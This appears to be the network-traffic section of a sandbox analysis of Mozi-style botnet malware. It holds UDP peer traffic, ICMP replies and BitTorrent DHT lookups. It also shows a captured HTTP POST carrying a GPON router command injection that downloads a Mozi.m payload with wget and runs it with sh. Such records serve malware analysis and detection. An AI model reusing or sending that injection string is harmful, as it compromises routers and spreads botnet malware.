                                                                                                                  Feb 6, 2021 11:35:44.563565969 CET898718069192.168.2.2093.159.141.166
                                                                                                                  Feb 6, 2021 11:35:45.172111034 CET89875060192.168.2.2081.227.171.215
                                                                                                                  Feb 6, 2021 11:35:46.063368082 CET89878083192.168.2.2087.248.19.119
                                                                                                                  Feb 6, 2021 11:35:46.367439032 CET89871900192.168.2.20178.141.168.56
                                                                                                                  Feb 6, 2021 11:35:47.276127100 CET89876881192.168.2.20178.141.73.115
                                                                                                                  Feb 6, 2021 11:35:47.358419895 CET898714358192.168.2.20178.141.57.66
                                                                                                                  Feb 6, 2021 11:35:47.392602921 CET68818987178.141.73.115192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:47.393970966 CET898737984192.168.2.20202.164.138.39
                                                                                                                  Feb 6, 2021 11:35:47.769217014 CET379848987202.164.138.39192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:47.770752907 CET898748131192.168.2.20178.141.171.18
                                                                                                                  Feb 6, 2021 11:35:47.862462997 CET481318987178.141.171.18192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:47.940551996 CET89875353192.168.2.20112.30.1.157
                                                                                                                  Feb 6, 2021 11:35:48.132273912 CET898762244192.168.2.2079.105.216.215
                                                                                                                  Feb 6, 2021 11:35:48.298929930 CET62244898779.105.216.215192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:48.300523043 CET898740986192.168.2.2045.153.51.171
                                                                                                                  Feb 6, 2021 11:35:48.446803093 CET40986898745.153.51.171192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:48.447483063 CET898761873192.168.2.20176.109.222.96
                                                                                                                  Feb 6, 2021 11:35:48.602679014 CET89876881192.168.2.2046.188.19.186
                                                                                                                  Feb 6, 2021 11:35:48.685651064 CET6881898746.188.19.186192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:48.686018944 CET898744659192.168.2.20185.43.102.247
                                                                                                                  Feb 6, 2021 11:35:48.795973063 CET446598987185.43.102.247192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:48.797498941 CET898751413192.168.2.20212.20.50.212
                                                                                                                  Feb 6, 2021 11:35:48.916394949 CET514138987212.20.50.212192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:48.916934967 CET898762567192.168.2.20178.37.211.235
                                                                                                                  Feb 6, 2021 11:35:48.999711990 CET625678987178.37.211.235192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:49.000322104 CET898749643192.168.2.2095.31.244.87
                                                                                                                  Feb 6, 2021 11:35:49.019474030 CET898715743192.168.2.2095.27.121.169
                                                                                                                  Feb 6, 2021 11:35:49.103745937 CET49643898795.31.244.87192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:49.103789091 CET15743898795.27.121.169192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:49.104335070 CET898712593192.168.2.20176.107.232.56
                                                                                                                  Feb 6, 2021 11:35:49.104547977 CET898751906192.168.2.202.94.128.27
                                                                                                                  Feb 6, 2021 11:35:49.193947077 CET125938987176.107.232.56192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:49.194582939 CET898758425192.168.2.2046.173.4.59
                                                                                                                  Feb 6, 2021 11:35:49.197165966 CET5190689872.94.128.27192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:49.197891951 CET898712698192.168.2.20145.255.34.13
                                                                                                                  Feb 6, 2021 11:35:49.285672903 CET126988987145.255.34.13192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:49.287220001 CET898718133192.168.2.20185.165.160.141
                                                                                                                  Feb 6, 2021 11:35:49.390279055 CET181338987185.165.160.141192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:49.390906096 CET89876881192.168.2.20201.87.105.15
                                                                                                                  Feb 6, 2021 11:35:49.658499002 CET68818987201.87.105.15192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:49.658997059 CET898752944192.168.2.2090.142.56.147
                                                                                                                  Feb 6, 2021 11:35:50.131747007 CET89878210192.168.2.20106.213.179.109
                                                                                                                  Feb 6, 2021 11:35:50.202265024 CET898736714192.168.2.20176.114.38.42
                                                                                                                  Feb 6, 2021 11:35:50.445736885 CET367148987176.114.38.42192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:50.446315050 CET89875813192.168.2.20125.164.96.224
                                                                                                                  Feb 6, 2021 11:35:50.666758060 CET82108987106.213.179.109192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:50.667346954 CET898715511192.168.2.2060.143.66.7
                                                                                                                  Feb 6, 2021 11:35:50.964287996 CET898757205192.168.2.20157.41.73.166
                                                                                                                  Feb 6, 2021 11:35:51.905126095 CET898764350192.168.2.2083.220.48.114
                                                                                                                  Feb 6, 2021 11:35:52.123469114 CET898764921192.168.2.2084.47.136.201
                                                                                                                  Feb 6, 2021 11:35:52.207324028 CET64921898784.47.136.201192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:52.208777905 CET89876845192.168.2.2046.242.13.252
                                                                                                                  Feb 6, 2021 11:35:52.296401024 CET6845898746.242.13.252192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:52.296932936 CET898751413192.168.2.2095.165.142.145
                                                                                                                  Feb 6, 2021 11:35:52.370593071 CET51413898795.165.142.145192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:52.371093035 CET898732999192.168.2.202.62.58.87
                                                                                                                  Feb 6, 2021 11:35:52.503038883 CET3299989872.62.58.87192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:52.503473997 CET898742834192.168.2.2045.61.102.179
                                                                                                                  Feb 6, 2021 11:35:52.646365881 CET42834898745.61.102.179192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:52.646980047 CET898728041192.168.2.20185.45.195.197
                                                                                                                  Feb 6, 2021 11:35:52.698120117 CET280418987185.45.195.197192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:52.698672056 CET898724629192.168.2.20142.54.169.178
                                                                                                                  Feb 6, 2021 11:35:52.969652891 CET246298987142.54.169.178192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:52.971246958 CET89876881192.168.2.2082.27.175.97
                                                                                                                  Feb 6, 2021 11:35:53.042486906 CET6881898782.27.175.97192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:53.043083906 CET898760051192.168.2.2073.53.94.90
                                                                                                                  Feb 6, 2021 11:35:53.093774080 CET89876884192.168.2.20128.106.116.66
                                                                                                                  Feb 6, 2021 11:35:53.252711058 CET60051898773.53.94.90192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:53.253293991 CET89876881192.168.2.205.135.190.37
                                                                                                                  Feb 6, 2021 11:35:53.305589914 CET688189875.135.190.37192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:53.306138992 CET898745204192.168.2.2085.75.132.130
                                                                                                                  Feb 6, 2021 11:35:53.396792889 CET45204898785.75.132.130192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:53.397341013 CET89877864192.168.2.20111.92.80.182
                                                                                                                  Feb 6, 2021 11:35:53.673074007 CET89875353192.168.2.2059.93.20.203
                                                                                                                  Feb 6, 2021 11:35:53.976419926 CET5353898759.93.20.203192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:53.977127075 CET898718143192.168.2.20120.224.242.151
                                                                                                                  Feb 6, 2021 11:36:09.291065931 CET39843898747.9.110.63192.168.2.20
                                                                                                                  Feb 6, 2021 11:36:09.293016911 CET898739843192.168.2.2047.9.110.63
                                                                                                                  Feb 6, 2021 11:36:09.293082952 CET89875353192.168.2.2059.97.168.156
                                                                                                                  Feb 6, 2021 11:36:09.500178099 CET5353898759.97.168.156192.168.2.20
                                                                                                                  Feb 6, 2021 11:36:09.580473900 CET89878080192.168.2.2059.99.95.203
                                                                                                                  Feb 6, 2021 11:36:10.573435068 CET8080898759.99.95.203192.168.2.20
                                                                                                                  Feb 6, 2021 11:36:10.575052023 CET89878082192.168.2.20220.71.34.228
                                                                                                                  Feb 6, 2021 11:36:10.862175941 CET80828987220.71.34.228192.168.2.20
                                                                                                                  Feb 6, 2021 11:36:10.863682032 CET89878646192.168.2.20130.239.18.159
                                                                                                                  Feb 6, 2021 11:36:10.932972908 CET86468987130.239.18.159192.168.2.20
                                                                                                                  Feb 6, 2021 11:36:10.934408903 CET89878606192.168.2.20130.239.18.159
                                                                                                                  Feb 6, 2021 11:36:11.003377914 CET86068987130.239.18.159192.168.2.20
                                                                                                                  Feb 6, 2021 11:36:11.003935099 CET89879031192.168.2.20130.239.18.159
                                                                                                                  Feb 6, 2021 11:36:11.075253010 CET90318987130.239.18.159192.168.2.20
                                                                                                                  Feb 6, 2021 11:36:11.075848103 CET89878700192.168.2.20130.239.18.159
                                                                                                                  Feb 6, 2021 11:36:11.144738913 CET87008987130.239.18.159192.168.2.20
                                                                                                                  Feb 6, 2021 11:36:11.145184040 CET89871900192.168.2.20140.143.227.62
                                                                                                                  Feb 6, 2021 11:36:41.044092894 CET898751413192.168.2.20176.195.8.31
                                                                                                                  Feb 6, 2021 11:36:49.353290081 CET898746932192.168.2.205.189.183.129
                                                                                                                  Feb 6, 2021 11:37:15.573966026 CET89871900192.168.2.20178.141.70.255
                                                                                                                  Feb 6, 2021 11:37:15.726702929 CET19008987178.141.70.255192.168.2.20
                                                                                                                  Feb 6, 2021 11:37:15.806847095 CET898736681192.168.2.20159.224.212.193
                                                                                                                  Feb 6, 2021 11:37:15.887155056 CET366818987159.224.212.193192.168.2.20
                                                                                                                  Feb 6, 2021 11:37:15.888614893 CET898723945192.168.2.20103.135.33.74
                                                                                                                  Feb 6, 2021 11:37:16.248785019 CET239458987103.135.33.74192.168.2.20
                                                                                                                  Feb 6, 2021 11:37:16.249336958 CET89878814192.168.2.20202.164.138.29
                                                                                                                  Feb 6, 2021 11:37:16.446306944 CET88148987202.164.138.29192.168.2.20
                                                                                                                  Feb 6, 2021 11:37:16.446850061 CET898756885192.168.2.2074.88.156.163
                                                                                                                  Feb 6, 2021 11:37:16.580174923 CET56885898774.88.156.163192.168.2.20
                                                                                                                  Feb 6, 2021 11:37:16.580737114 CET898728041192.168.2.20185.107.71.131
                                                                                                                  Feb 6, 2021 11:37:16.631706953 CET280418987185.107.71.131192.168.2.20
                                                                                                                  Feb 6, 2021 11:37:16.632149935 CET898749001192.168.2.2078.106.157.169
                                                                                                                  Feb 6, 2021 11:37:16.727010012 CET49001898778.106.157.169192.168.2.20
                                                                                                                  Feb 6, 2021 11:37:16.728323936 CET89871954192.168.2.20188.19.164.62
                                                                                                                  Feb 6, 2021 11:37:16.855324030 CET19548987188.19.164.62192.168.2.20
                                                                                                                  Feb 6, 2021 11:37:16.855607986 CET898724951192.168.2.20109.189.50.131
                                                                                                                  Feb 6, 2021 11:37:16.931021929 CET249518987109.189.50.131192.168.2.20
                                                                                                                  Feb 6, 2021 11:37:16.931487083 CET89876889192.168.2.2091.182.50.28

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                                                                                                  Feb 6, 2021 11:36:45.219928026 CET74.127.237.186192.168.2.20fda7(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:47.720118999 CET46.29.176.109192.168.2.20a1d7(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:47.829720974 CET66.169.97.135192.168.2.2042b7(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:48.215275049 CET202.152.175.145192.168.2.207478(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:36:50.970527887 CET202.239.98.106192.168.2.20b0ce(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:50.970568895 CET202.239.98.106192.168.2.20b0ce(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:50.970587969 CET202.239.98.106192.168.2.20b0ce(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:54.750679016 CET216.66.80.222192.168.2.2094f9(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:36:55.008846998 CET187.95.254.41192.168.2.207973(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:55.362935066 CET46.83.254.38192.168.2.2080aa(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:57.700253963 CET149.11.89.129192.168.2.2046bf(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:57.803073883 CET170.39.196.42192.168.2.20c070(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:36:58.075360060 CET87.167.162.206192.168.2.20a9c0(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:36:58.839452028 CET12.83.40.125192.168.2.203e85(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:01.766206980 CET80.250.191.54192.168.2.20bdf3(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:01.952404022 CET154.85.22.47192.168.2.207065(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:04.904623032 CET198.202.27.75192.168.2.2081ca(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:08.978775978 CET133.101.244.12192.168.2.20c032(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:11.468447924 CET93.189.172.1192.168.2.20c68c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:11.468493938 CET93.189.172.1192.168.2.20c68c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:11.958113909 CET201.218.129.193192.168.2.20bb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:11.958175898 CET201.218.129.193192.168.2.20bb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:14.572334051 CET93.189.172.1192.168.2.20c68c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:14.955627918 CET201.218.129.193192.168.2.20bb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:15.732269049 CET185.53.64.10192.168.2.20b476(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:18.727646112 CET94.216.193.84192.168.2.20c71a(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:22.315923929 CET213.88.203.94192.168.2.20f88c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:23.765324116 CET217.7.204.55192.168.2.204166(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:25.949588060 CET200.130.102.2192.168.2.20abbf(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:29.760623932 CET92.45.252.1192.168.2.201d2e(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:29.880379915 CET59.180.210.210192.168.2.205deb(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:30.823168993 CET24.124.216.86192.168.2.20ed07(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:32.144381046 CET152.255.157.71192.168.2.201991(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:32.716325045 CET176.20.218.166192.168.2.204aa3(Port unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:39.948029995 CET192.168.1.238192.168.2.203db6(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:39.948069096 CET192.168.1.238192.168.2.203db6(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:40.756258011 CET91.96.55.112192.168.2.207188(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:41.912420034 CET204.225.31.22192.168.2.204023(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:42.948151112 CET192.168.1.238192.168.2.203db6(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:43.980493069 CET193.50.198.5192.168.2.20800e(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:44.010180950 CET203.13.23.2192.168.2.203a5c(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:45.761795998 CET130.93.107.38192.168.2.205c64(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:46.778093100 CET207.252.72.17192.168.2.20dbdc(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:46.778139114 CET207.252.72.17192.168.2.20dbdc(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:46.816617012 CET96.110.161.14192.168.2.20e926(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:49.778034925 CET207.252.72.17192.168.2.20dbdc(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:50.712635040 CET80.255.14.222192.168.2.20e069(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:50.833848000 CET131.100.27.86192.168.2.205e9b(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:50.842205048 CET137.103.65.26192.168.2.2033c0(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:37:53.300148010 CET84.246.147.2192.168.2.20ab76(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:53.300194979 CET84.246.147.2192.168.2.20ab76(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:53.873837948 CET24.30.175.202192.168.2.20b0bf(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:56.350054026 CET84.246.147.2192.168.2.20ab76(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:56.616941929 CET154.54.44.198192.168.2.20eb98(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:57.715239048 CET77.7.89.221192.168.2.20a656(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:57.798033953 CET149.28.33.22192.168.2.207610(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:37:58.016733885 CET211.122.27.21192.168.2.20330(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:01.420928001 CET154.54.44.198192.168.2.20eb98(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:02.713757038 CET149.11.89.129192.168.2.2059f4(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:04.710871935 CET213.222.29.194192.168.2.204bc6(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:04.717515945 CET93.221.222.106192.168.2.2017e9(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:05.743998051 CET149.11.89.129192.168.2.20af2c(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:07.142713070 CET37.132.182.1192.168.2.209c62(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:11.732172012 CET192.109.241.43192.168.2.207181(Port unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:11.782967091 CET217.121.74.29192.168.2.20e380(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:11.804955959 CET91.135.147.130192.168.2.20d8a(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:13.767189980 CET81.31.150.226192.168.2.202c0e(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:18.714807987 CET87.149.61.90192.168.2.202b5e(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:18.843714952 CET78.38.241.74192.168.2.20f1ca(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:21.574739933 CET103.24.165.198192.168.2.207d0f(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:21.574815989 CET103.24.165.198192.168.2.207d0f(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:22.828773975 CET63.148.112.178192.168.2.208de4(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:24.778537035 CET103.24.165.198192.168.2.207d0f(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:25.853256941 CET67.142.145.156192.168.2.20a32f(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:28.774642944 CET212.149.148.17192.168.2.202888(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:28.859281063 CET192.168.221.30192.168.2.2087cd(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:28.859548092 CET192.168.221.30192.168.2.2087cd(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:30.950723886 CET89.64.16.63192.168.2.20d90f(Port unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:31.859373093 CET192.168.221.30192.168.2.2087cd(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:32.014236927 CET216.66.112.1192.168.2.20fb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:32.014302969 CET216.66.112.1192.168.2.20fb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:32.765140057 CET185.33.175.11192.168.2.20bea7(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:32.842708111 CET172.241.192.161192.168.2.202d74(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:36.759669065 CET217.28.252.209192.168.2.206f68(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:37.165035009 CET192.168.145.206192.168.2.203fc0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:37.165076971 CET192.168.145.206192.168.2.203fc0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:39.957926035 CET191.6.231.6192.168.2.205e2b(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:40.171212912 CET192.168.145.206192.168.2.203fc0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:46.822525978 CET10.150.7.30192.168.2.2051ef(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:46.822566032 CET10.150.7.30192.168.2.2051ef(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:49.074318886 CET131.221.122.181192.168.2.20be7c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:49.074363947 CET131.221.122.181192.168.2.20be7c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:49.822412968 CET10.150.7.30192.168.2.2051ef(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:50.891179085 CET64.58.5.1192.168.2.20afa5(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:52.356667995 CET131.221.122.181192.168.2.20be7c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:52.951423883 CET148.240.205.26192.168.2.208c73(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:38:53.705729008 CET80.255.15.98192.168.2.20ede5(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:54.878962040 CET76.167.28.194192.168.2.20f232(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:57.745919943 CET178.27.146.71192.168.2.201bae(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:38:59.016284943 CET216.66.112.1192.168.2.20fb0(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:03.893297911 CET76.91.242.109192.168.2.20f57(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:03.893337965 CET76.91.242.109192.168.2.20f57(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:06.902409077 CET76.91.242.109192.168.2.20f57(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:08.252276897 CET152.255.139.166192.168.2.201e68(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:39:08.696783066 CET149.11.89.129192.168.2.20dba3(Net unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:10.859294891 CET162.39.153.129192.168.2.20fb97(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:10.859337091 CET162.39.153.129192.168.2.20fb97(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:11.007601023 CET43.225.35.238192.168.2.206b5c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:11.997694016 CET43.225.35.238192.168.2.206b5c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:11.997744083 CET43.225.35.238192.168.2.206b5c(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:12.840609074 CET64.182.214.179192.168.2.201722(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:39:13.859841108 CET162.39.153.129192.168.2.20fb97(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:13.928651094 CET211.237.128.254192.168.2.2070a4(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:39:17.747221947 CET87.155.20.45192.168.2.20360a(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:21.751763105 CET178.27.214.206192.168.2.20474(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:22.834263086 CET85.46.86.42192.168.2.209346(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:22.834309101 CET85.46.86.42192.168.2.209346(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:22.834326982 CET85.46.86.42192.168.2.209346(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:23.908087969 CET103.4.243.6192.168.2.204bb8(Time to live exceeded in transit)Time Exceeded
                                                                                                                  Feb 6, 2021 11:39:24.734756947 CET78.64.7.35192.168.2.20c141(Host unreachable)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:24.749552965 CET84.141.215.230192.168.2.20574f(Unknown)Destination Unreachable
                                                                                                                  Feb 6, 2021 11:39:28.759598017 CET217.236.144.108192.168.2.201c47(Unknown)Destination Unreachable

DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Feb 6, 2021 11:35:36.888931036 CET | 192.168.2.20 | 8.8.8.8 | 0x2 | Standard query (0) | dht.transmissionbt.com | A (IP address) | IN (0x0001) |
| Feb 6, 2021 11:35:36.937874079 CET | 192.168.2.20 | 8.8.8.8 | 0x3 | Standard query (0) | router.bittorrent.com | A (IP address) | IN (0x0001) |
| Feb 6, 2021 11:35:36.986057997 CET | 192.168.2.20 | 8.8.8.8 | 0x4 | Standard query (0) | router.utorrent.com | A (IP address) | IN (0x0001) |
| Feb 6, 2021 11:35:37.037029982 CET | 192.168.2.20 | 8.8.8.8 | 0x5 | Standard query (0) | bttracker.debian.org | A (IP address) | IN (0x0001) |

DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Feb 6, 2021 11:35:36.936109066 CET | 8.8.8.8 | 192.168.2.20 | 0x2 | No error (0) | dht.transmissionbt.com | | 212.129.33.59 | A (IP address) | IN (0x0001) |
| Feb 6, 2021 11:35:36.936109066 CET | 8.8.8.8 | 192.168.2.20 | 0x2 | No error (0) | dht.transmissionbt.com | | 87.98.162.88 | A (IP address) | IN (0x0001) |
| Feb 6, 2021 11:35:36.985169888 CET | 8.8.8.8 | 192.168.2.20 | 0x3 | No error (0) | router.bittorrent.com | | 67.215.246.10 | A (IP address) | IN (0x0001) |
| Feb 6, 2021 11:35:37.036135912 CET | 8.8.8.8 | 192.168.2.20 | 0x4 | No error (0) | router.utorrent.com | | 82.221.103.244 | A (IP address) | IN (0x0001) |
| Feb 6, 2021 11:35:37.087090969 CET | 8.8.8.8 | 192.168.2.20 | 0x5 | No error (0) | bttracker.debian.org | bttracker.acc.umu.se | | CNAME (Canonical name) | IN (0x0001) |
| Feb 6, 2021 11:35:37.087090969 CET | 8.8.8.8 | 192.168.2.20 | 0x5 | No error (0) | bttracker.acc.umu.se | | 130.239.18.159 | A (IP address) | IN (0x0001) |

HTTP Request Dependency Graph

                                                                                                                  HTTP Packets

                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  0 | 192.168.2.20 | 38870 | 151.139.241.251 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:35:25.024089098 CET | 52 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                  Feb 6, 2021 11:35:25.069941044 CET | 53 | IN | HTTP/1.1 404 127.0.0.1 NOT found
                                                                                                                  Date: Sat, 06 Feb 2021 10:35:25 GMT
                                                                                                                  Server: Varnish
                                                                                                                  X-Cache: MISS
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: keep-alive


